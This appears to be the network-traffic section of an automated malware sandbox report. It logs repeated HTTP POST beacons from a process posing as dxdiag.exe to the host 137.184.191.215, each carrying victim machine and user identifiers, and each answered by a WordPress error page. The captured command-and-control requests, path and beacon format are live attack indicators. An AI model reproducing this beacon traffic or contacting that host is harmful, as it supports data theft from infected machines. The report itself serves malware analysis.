                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:13.143532038 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:51:13.143542051 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:51:13.143650055 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.565333137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:13.296047926 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:13.301214933 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:15.949476004 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:13 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:15.949498892 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:15.949510098 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.565334137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:16.093961954 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:16.098836899 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:18.675030947 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:16 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:18.675051928 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:18.675062895 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.565335137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:18.886756897 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:18.891592979 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:21.495783091 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:19 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:21.495805025 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:21.495820045 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.565336137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:21.655563116 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:21.660429001 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:24.246186018 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:22 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:24.246217966 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:51:24.246257067 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.565337137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:51:24.392869949 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:51:24.397670984 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:51:27.042427063 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:51:24 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:51:27.042447090 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
